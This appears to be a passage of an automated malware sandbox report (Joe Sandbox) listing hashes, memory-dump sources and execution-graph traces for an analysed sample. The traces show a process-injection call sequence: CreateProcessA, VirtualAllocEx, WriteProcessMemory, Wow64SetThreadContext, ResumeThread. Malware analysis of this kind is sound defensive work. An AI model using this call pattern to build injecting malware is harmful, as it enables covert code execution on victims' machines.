                                                                                                                    • Instruction ID: 6d13a8855f79bb74efe60ffc0749936dded3ae134c867b1720e7785903ebd499
                                                                                                                    • Opcode Fuzzy Hash: 2b0d9d377ceea3b5d461b43663b475af2da712c1466ba2663b016df2f05f5274
                                                                                                                    • Instruction Fuzzy Hash: 96B12830F00219CBDB58DF69D9846AEB7F6EF84301F248829D40A9B358DB74DC82CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                    • API String ID: 0-2454687669
                                                                                                                    • Opcode ID: 800ae89705c78aef3cdf71e2886ff937cec1f2709dabff2662b17dde8c1aad10
                                                                                                                    • Instruction ID: 921794ff83e789ec5056c689c32fcabccc5db09f3e3656d95d5990ac4859c923
                                                                                                                    • Opcode Fuzzy Hash: 800ae89705c78aef3cdf71e2886ff937cec1f2709dabff2662b17dde8c1aad10
                                                                                                                    • Instruction Fuzzy Hash: A551A330B00205DFDF58DF28D854AAAB7FAFB89711F149569D4069B398DB70EC41CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 7a95d7accedc7061b6ccdf64d2bda37f934405b49f5857478753d7f55cc0d454
                                                                                                                    • Instruction ID: 0583d4b9a499725d40c511873470c716c2b826c1d4785567d02fe815fa50b11a
                                                                                                                    • Opcode Fuzzy Hash: 7a95d7accedc7061b6ccdf64d2bda37f934405b49f5857478753d7f55cc0d454
                                                                                                                    • Instruction Fuzzy Hash: 27516970F10205CFDB65DB68E5846EEB7F2EB89301F28992AE406DB248DB35DC41CB91

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:11.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:135
                                                                                                                    Total number of Limit Nodes:8
                                                                                                                    execution_graph 23473 180d000 23474 180d046 GetCurrentProcess 23473->23474 23476 180d091 23474->23476 23477 180d098 GetCurrentThread 23474->23477 23476->23477 23478 180d0d5 GetCurrentProcess 23477->23478 23479 180d0ce 23477->23479 23480 180d10b 23478->23480 23479->23478 23481 180d133 GetCurrentThreadId 23480->23481 23482 180d164 23481->23482 23575 76b0d0b 23578 b5eebc0 23575->23578 23579 b5eec00 VirtualAllocEx 23578->23579 23581 76b0d29 23579->23581 23483 76b0929 23484 76b094c 23483->23484 23487 b5eec80 23484->23487 23488 b5eecc8 WriteProcessMemory 23487->23488 23490 76b0bf3 23488->23490 23586 b5e1179 23587 b5e117c 23586->23587 23588 b5e11e1 23587->23588 23589 b5e2778 VirtualProtect 23587->23589 23590 b5e2770 VirtualProtect 23587->23590 23589->23587 23590->23587 23491 76b04a3 23494 b5eef08 23491->23494 23495 b5eef91 CreateProcessA 23494->23495 23497 b5ef153 23495->23497 23591 1804668 23592 1804672 23591->23592 23594 1804759 23591->23594 23595 180477d 23594->23595 23599 1804858 23595->23599 23603 1804868 23595->23603 23601 1804868 23599->23601 23600 180496c 23600->23600 23601->23600 23607 18044b0 23601->23607 23604 180488f 23603->23604 23605 18044b0 CreateActCtxA 23604->23605 23606 180496c 23604->23606 23605->23606 23608 18058f8 CreateActCtxA 23607->23608 23610 18059bb 23608->23610 23498 76b08a7 23499 76b05eb 23498->23499 23500 76b0600 23499->23500 23502 b5eea38 23499->23502 23503 b5eea78 ResumeThread 23502->23503 23505 b5eeaa9 23503->23505 23505->23500 23506 76b06bb 23507 76b09a6 23506->23507 23510 b5eeae8 23507->23510 23511 b5eeb2d Wow64SetThreadContext 23510->23511 23513 76b09c1 23511->23513 23514 180d650 DuplicateHandle 23515 180d6e6 23514->23515 23619 180ac70 23620 180ac7f 23619->23620 23623 180ad68 23619->23623 23628 180ad59 23619->23628 23624 180ad9c 23623->23624 23625 180ad79 23623->23625 23624->23620 23625->23624 23626 180afa0 GetModuleHandleW 23625->23626 23627 180afcd 23626->23627 23627->23620 23629 180ad9c 23628->23629 23630 180ad79 23628->23630 23629->23620 23630->23629 23631 180afa0 GetModuleHandleW 23630->23631 23632 180afcd 23631->23632 23632->23620 23633 b5e046c 23635 b5e2778 VirtualProtect 23633->23635 23636 b5e2770 VirtualProtect 23633->23636 23634 b5e049d 23635->23634 23636->23634 23637 76b0819 23642 76b1128 23637->23642 23646 76b1160 23637->23646 23651 76b1123 23637->23651 23638 76b0831 23643 76b112e 23642->23643 23645 b5eeae8 Wow64SetThreadContext 23643->23645 23644 76b1153 23644->23638 23645->23644 23647 76b1126 23646->23647 23648 76b116b 23647->23648 23650 b5eeae8 Wow64SetThreadContext 23647->23650 23648->23638 23649 76b1153 23649->23638 23650->23649 23652 76b1128 23651->23652 23654 b5eeae8 Wow64SetThreadContext 23652->23654 23653 76b1153 23653->23638 23654->23653 23516 b5e0b4d 23520 b5e2778 23516->23520 23523 b5e2770 23516->23523 23517 b5e0b5e 23521 b5e27c0 VirtualProtect 23520->23521 23522 b5e27fa 23521->23522 23522->23517 23524 b5e27c0 VirtualProtect 23523->23524 23525 b5e27fa 23524->23525 23525->23517 23655 76b0a98 23656 76b0abe 23655->23656 23659 b5eed70 23656->23659 23660 b5eedbb ReadProcessMemory 23659->23660 23662 76b0ae0 23660->23662 23663 76b0952 23664 76b095b 23663->23664 23666 b5eec80 WriteProcessMemory 23664->23666 23665 76b0683 23666->23665 23534 b5e2880 23535 b5e28a7 23534->23535 23539 b5e2b4b 23535->23539 23544 b5e2b58 23535->23544 23536 b5e291e 23541 b5e2b58 23539->23541 23540 b5e2bcc 23540->23536 23541->23540 23549 76b11ab 23541->23549 23554 76b11b0 23541->23554 23546 b5e2b7f 23544->23546 23545 b5e2bcc 23545->23536 23546->23545 23547 76b11ab 2 API calls 23546->23547 23548 76b11b0 2 API calls 23546->23548 23547->23546 23548->23546 23550 76b11b0 23549->23550 23551 76b11d0 23550->23551 23559 76b11db 23550->23559 23565 76b1218 23550->23565 23551->23541 23555 76b11c2 23554->23555 23556 76b11d0 23555->23556 23557 76b11db 2 API calls 23555->23557 23558 76b1218 2 API calls 23555->23558 23556->23541 23557->23556 23558->23556 23560 76b11e3 23559->23560 23562 76b11a6 23559->23562 23560->23551 23561 76b11aa 23561->23551 23562->23561 23570 76b14a8 PostMessageW 23562->23570 23572 76b14a3 23562->23572 23566 76b11a6 23565->23566 23567 76b11aa 23566->23567 23568 76b14a8 PostMessageW 23566->23568 23569 76b14a3 PostMessageW 23566->23569 23567->23551 23568->23566 23569->23566 23571 76b1514 23570->23571 23571->23562 23573 76b14a8 PostMessageW 23572->23573 23574 76b1514 23573->23574 23574->23562

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 294 180cff1-180d08f GetCurrentProcess 298 180d091-180d097 294->298 299 180d098-180d0cc GetCurrentThread 294->299 298->299 300 180d0d5-180d109 GetCurrentProcess 299->300 301 180d0ce-180d0d4 299->301 302 180d112-180d12d call 180d5d8 300->302 303 180d10b-180d111 300->303 301->300 307 180d133-180d162 GetCurrentThreadId 302->307 303->302 308 180d164-180d16a 307->308 309 180d16b-180d1cd 307->309 308->309
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0180D07E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0180D0BB
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0180D0F8
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0180D151
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1851309213.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_1800000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: a1ff4c3f79f50a5e75cd8b5749486349a6ee9d43803adcc34989f2a8872fce16
                                                                                                                    • Instruction ID: ed14d95a4a31724f945843fb61c2dbbbe1b2ed8fd95d60c6a1392cd38c92459a
                                                                                                                    • Opcode Fuzzy Hash: a1ff4c3f79f50a5e75cd8b5749486349a6ee9d43803adcc34989f2a8872fce16
                                                                                                                    • Instruction Fuzzy Hash: 785168B09007098FDB18DFA9D988BDEBBF1EF48314F208459D509A73A0C7355A88CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 316 180d000-180d08f GetCurrentProcess 320 180d091-180d097 316->320 321 180d098-180d0cc GetCurrentThread 316->321 320->321 322 180d0d5-180d109 GetCurrentProcess 321->322 323 180d0ce-180d0d4 321->323 324 180d112-180d12d call 180d5d8 322->324 325 180d10b-180d111 322->325 323->322 329 180d133-180d162 GetCurrentThreadId 324->329 325->324 330 180d164-180d16a 329->330 331 180d16b-180d1cd 329->331 330->331
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0180D07E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0180D0BB
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0180D0F8
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0180D151
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1851309213.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_1800000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: 6d2666ce8e363d6c807406a0dd41a7396035ef2c83aa41aecc45bcc04592cc60
                                                                                                                    • Instruction ID: 15c5e286e9b9de239611824ab08d655fb38773bc14bb0be9bade6a4f509b5a9b
                                                                                                                    • Opcode Fuzzy Hash: 6d2666ce8e363d6c807406a0dd41a7396035ef2c83aa41aecc45bcc04592cc60
                                                                                                                    • Instruction Fuzzy Hash: 4C5169B09007098FDB58DFA9C988B9EBBF1EF48314F208419D509A7390D7345A84CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 437 b5eef08-b5eef9d 439 b5eef9f-b5eefa9 437->439 440 b5eefd6-b5eeff6 437->440 439->440 441 b5eefab-b5eefad 439->441 447 b5ef02f-b5ef05e 440->447 448 b5eeff8-b5ef002 440->448 442 b5eefaf-b5eefb9 441->442 443 b5eefd0-b5eefd3 441->443 445 b5eefbd-b5eefcc 442->445 446 b5eefbb 442->446 443->440 445->445 449 b5eefce 445->449 446->445 454 b5ef097-b5ef151 CreateProcessA 447->454 455 b5ef060-b5ef06a 447->455 448->447 450 b5ef004-b5ef006 448->450 449->443 452 b5ef008-b5ef012 450->452 453 b5ef029-b5ef02c 450->453 456 b5ef016-b5ef025 452->456 457 b5ef014 452->457 453->447 468 b5ef15a-b5ef1e0 454->468 469 b5ef153-b5ef159 454->469 455->454 459 b5ef06c-b5ef06e 455->459 456->456 458 b5ef027 456->458 457->456 458->453 460 b5ef070-b5ef07a 459->460 461 b5ef091-b5ef094 459->461 463 b5ef07e-b5ef08d 460->463 464 b5ef07c 460->464 461->454 463->463 466 b5ef08f 463->466 464->463 466->461 479 b5ef1e2-b5ef1e6 468->479 480 b5ef1f0-b5ef1f4 468->480 469->468 479->480 481 b5ef1e8 479->481 482 b5ef1f6-b5ef1fa 480->482 483 b5ef204-b5ef208 480->483 481->480 482->483 484 b5ef1fc 482->484 485 b5ef20a-b5ef20e 483->485 486 b5ef218-b5ef21c 483->486 484->483 485->486 487 b5ef210 485->487 488 b5ef22e-b5ef235 486->488 489 b5ef21e-b5ef224 486->489 487->486 490 b5ef24c 488->490 491 b5ef237-b5ef246 488->491 489->488 491->490
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B5EF13E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1860046935.000000000B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_b5e0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: 3f58ae8d91640c12bc9f10daafc920497db35f77098f8eccec73ca545c427519
                                                                                                                    • Instruction ID: a0e31c7583f2245a5e96766f8b027c549628fa67d5d900d8f4b157e4f97ad251
                                                                                                                    • Opcode Fuzzy Hash: 3f58ae8d91640c12bc9f10daafc920497db35f77098f8eccec73ca545c427519
                                                                                                                    • Instruction Fuzzy Hash: B1918F71D003198FEB18DF68CC417EEBBB2BF44310F1485A9E819A7280DB759985CFA2

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 493 180ad68-180ad77 494 180ada3-180ada7 493->494 495 180ad79-180ad86 call 180a08c 493->495 496 180ada9-180adb3 494->496 497 180adbb-180adfc 494->497 502 180ad88 495->502 503 180ad9c 495->503 496->497 504 180ae09-180ae17 497->504 505 180adfe-180ae06 497->505 551 180ad8e call 180aff0 502->551 552 180ad8e call 180b000 502->552 503->494 506 180ae19-180ae1e 504->506 507 180ae3b-180ae3d 504->507 505->504 510 180ae20-180ae27 call 180a098 506->510 511 180ae29 506->511 509 180ae40-180ae47 507->509 508 180ad94-180ad96 508->503 512 180aed8-180af54 508->512 515 180ae54-180ae5b 509->515 516 180ae49-180ae51 509->516 514 180ae2b-180ae39 510->514 511->514 543 180af80-180af98 512->543 544 180af56-180af7e 512->544 514->509 517 180ae68-180ae71 call 180a0a8 515->517 518 180ae5d-180ae65 515->518 516->515 524 180ae73-180ae7b 517->524 525 180ae7e-180ae83 517->525 518->517 524->525 526 180aea1-180aea5 525->526 527 180ae85-180ae8c 525->527 532 180aeab-180aeae 526->532 527->526 529 180ae8e-180ae9e call 180a0b8 call 180a0c8 527->529 529->526 533 180aeb0-180aece 532->533 534 180aed1-180aed7 532->534 533->534 546 180afa0-180afcb GetModuleHandleW 543->546 547 180af9a-180af9d 543->547 544->543 548 180afd4-180afe8 546->548 549 180afcd-180afd3 546->549 547->546 549->548 551->508 552->508
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0180AFBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1851309213.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_1800000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: c7f692cc3847b5b4d13bee0b9079338ada770a7c7d2d4bb710aeb23a617894f3
                                                                                                                    • Instruction ID: 6e9c7db11a87873d9a4ab210246d681b2bb1ecf0e2cb1c868f4d7c2ee03cced6
                                                                                                                    • Opcode Fuzzy Hash: c7f692cc3847b5b4d13bee0b9079338ada770a7c7d2d4bb710aeb23a617894f3
                                                                                                                    • Instruction Fuzzy Hash: 318169B0A00B098FD769DF29C44479ABBF1FF88304F00892ED44AD7A90D735EA49CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 553 18058ed-18058f4 554 1805891-18058b9 553->554 555 18058f6 553->555 558 18058c2-18058e3 554->558 559 18058bb-18058c1 554->559 557 18058f8-18059b9 CreateActCtxA 555->557 561 18059c2-1805a1c 557->561 562 18059bb-18059c1 557->562 559->558 570 1805a2b-1805a2f 561->570 571 1805a1e-1805a21 561->571 562->561 572 1805a40 570->572 573 1805a31-1805a3d 570->573 571->570 575 1805a41 572->575 573->572 575->575
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 018059A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1851309213.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_1800000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: 6308ae62b7875658852b85cb609b4d2304510f33e5c02bf5c4eb1871f7ed056a
                                                                                                                    • Instruction ID: 96e5cea0b1b2d8322524b33a95719dd130cccdc179e917a4221ab653a9cf90bb
                                                                                                                    • Opcode Fuzzy Hash: 6308ae62b7875658852b85cb609b4d2304510f33e5c02bf5c4eb1871f7ed056a
                                                                                                                    • Instruction Fuzzy Hash: 555101B1D00719CFDB24CFA9C88479EBBF5BF48314F20806AD509AB291D7756A85CFA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 576 18044b0-18059b9 CreateActCtxA 579 18059c2-1805a1c 576->579 580 18059bb-18059c1 576->580 587 1805a2b-1805a2f 579->587 588 1805a1e-1805a21 579->588 580->579 589 1805a40 587->589 590 1805a31-1805a3d 587->590 588->587 592 1805a41 589->592 590->589 592->592
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 018059A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1851309213.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_1800000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: f59cab5e80a3cdf01cc3c3c3e90475947566483b3a2567e568baf3324697510c
                                                                                                                    • Instruction ID: 0b3e5408d431064da3c2870dd3b980efd57cb6b88d04c66448dea43f6b372699
                                                                                                                    • Opcode Fuzzy Hash: f59cab5e80a3cdf01cc3c3c3e90475947566483b3a2567e568baf3324697510c
                                                                                                                    • Instruction Fuzzy Hash: 9541F5B0D0071DCBDB24DFA9C884BDDBBB5BF48304F20806AD509AB251DB756A45CF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 593 b5eec80-b5eecce 595 b5eecde-b5eed1d WriteProcessMemory 593->595 596 b5eecd0-b5eecdc 593->596 598 b5eed1f-b5eed25 595->598 599 b5eed26-b5eed56 595->599 596->595 598->599
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B5EED10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1860046935.000000000B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_b5e0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: e59232920d0a1fc81eef31072d706e747e0581ab0ec3fe1695f15f06eaf43a03
                                                                                                                    • Instruction ID: ce5d9779a6543a7e7443e65be0a90680c0c00b7e285c5f7b63de9d5f9efbc833
                                                                                                                    • Opcode Fuzzy Hash: e59232920d0a1fc81eef31072d706e747e0581ab0ec3fe1695f15f06eaf43a03
                                                                                                                    • Instruction Fuzzy Hash: B0213BB19003099FDB14DFA9C885BDEBBF5FF48310F108429E959A7240C7759954DBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 603 180d648-180d64e 604 180d650-180d6e4 DuplicateHandle 603->604 605 180d6e6-180d6ec 604->605 606 180d6ed-180d70a 604->606 605->606
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0180D6D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1851309213.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_1800000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 4216bb6820cde2ced564cd35924f26589f4ed51ec5bda4ff2977596211e72637
                                                                                                                    • Instruction ID: b9b3fe20fc9638d0a8d00bc9c9fd0ee9ac048c6620fab0d8e42a2383c4c59376
                                                                                                                    • Opcode Fuzzy Hash: 4216bb6820cde2ced564cd35924f26589f4ed51ec5bda4ff2977596211e72637
                                                                                                                    • Instruction Fuzzy Hash: E721E5B59003089FDB10CF9AD884ADEBBF5EB48314F14801AE958A7350D375AA44CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 609 b5eeae8-b5eeb33 611 b5eeb35-b5eeb41 609->611 612 b5eeb43-b5eeb73 Wow64SetThreadContext 609->612 611->612 614 b5eeb7c-b5eebac 612->614 615 b5eeb75-b5eeb7b 612->615 615->614
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B5EEB66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1860046935.000000000B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_b5e0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: af4425f3bbac792ac99a876c6f4d95d7378a39ebee3d7473c8684f0383151ec8
                                                                                                                    • Instruction ID: cd2af0da2e2d8820271203b2c4d395166e235515a27a66cf42c90636a5693aa7
                                                                                                                    • Opcode Fuzzy Hash: af4425f3bbac792ac99a876c6f4d95d7378a39ebee3d7473c8684f0383151ec8
                                                                                                                    • Instruction Fuzzy Hash: 0C2138B19003098FDB14DFAAC4857EEBBF4EF88324F14842AD559A7241CB78A944CFA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 619 b5eed70-b5eedfd ReadProcessMemory 622 b5eedff-b5eee05 619->622 623 b5eee06-b5eee36 619->623 622->623
                                                                                                                    APIs
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B5EEDF0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1860046935.000000000B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_b5e0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1726664587-0
                                                                                                                    • Opcode ID: 454b9ba7f351fca059a527c9d8664cacc96ebe8e6b8d68fd1ac5e2449ae20bdc
                                                                                                                    • Instruction ID: 8778a3f65e4e09f87579edc76de0afeaaf523cf0fb355007637fb6ceb33dd6ad
                                                                                                                    • Opcode Fuzzy Hash: 454b9ba7f351fca059a527c9d8664cacc96ebe8e6b8d68fd1ac5e2449ae20bdc
                                                                                                                    • Instruction Fuzzy Hash: F62148B18003599FDB10DFAAC885ADEFBF5FF48310F10842AE519A7240C7749940DBA0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 627 180d650-180d6e4 DuplicateHandle 628 180d6e6-180d6ec 627->628 629 180d6ed-180d70a 627->629 628->629
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0180D6D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1851309213.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_1800000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 0c36a861340e2d6c265dc7a7420e353d22652208a26bb5a5e670fbb4c1d4aa90
                                                                                                                    • Instruction ID: 87108c857654f498e1f291b376e68dcb778293908b5f2732d7af3fadf0104d2a
                                                                                                                    • Opcode Fuzzy Hash: 0c36a861340e2d6c265dc7a7420e353d22652208a26bb5a5e670fbb4c1d4aa90
                                                                                                                    • Instruction Fuzzy Hash: DA21E4B59002089FDB10CF9AD884ADEBFF4EB48310F14801AE918A7350C375A944CFA4
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0B5E27EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1860046935.000000000B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_b5e0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 3bc2d251c7fdb8b0d38e3bbd92b6900acb3b8476ebf873bd90333708aeabd466
                                                                                                                    • Instruction ID: dc912a203651a381108ff70331d38a2c50f24c6ac96be2fdc5deec7990dd72e4
                                                                                                                    • Opcode Fuzzy Hash: 3bc2d251c7fdb8b0d38e3bbd92b6900acb3b8476ebf873bd90333708aeabd466
                                                                                                                    • Instruction Fuzzy Hash: 5C21F9B59003499FDB14DF9AC884BDEFBF8FB48320F108469E968A7251D375A544CFA1
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0B5E27EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1860046935.000000000B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_b5e0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: b3af8c53069a5c3bd0887d138f2e828b539635083b29d0e376028ee38d9f59c6
                                                                                                                    • Instruction ID: 068d494dbeafa0dfe94c42d3c82761b717b327d922c70bd2739b9953dc3eb9c0
                                                                                                                    • Opcode Fuzzy Hash: b3af8c53069a5c3bd0887d138f2e828b539635083b29d0e376028ee38d9f59c6
                                                                                                                    • Instruction Fuzzy Hash: 572117B59002499FDB10CF9AC984BDEFBF4FB48320F14846AE868A7351D379A544CFA1
                                                                                                                    APIs
                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B5EEC2E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1860046935.000000000B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_b5e0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 0291b3f71eba716cf8b47cdd6e52afa564de37a87e9c939549a8db395cdd97b6
                                                                                                                    • Instruction ID: dbf5e29fc016237cc310a69a1e1e0d5eb18e04880d8fb523714029cdac17feea
                                                                                                                    • Opcode Fuzzy Hash: 0291b3f71eba716cf8b47cdd6e52afa564de37a87e9c939549a8db395cdd97b6
                                                                                                                    • Instruction Fuzzy Hash: 631156718002088FDB14DFAAC845AEFBBF5EB88320F208419E529A7250C775A940CBA0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
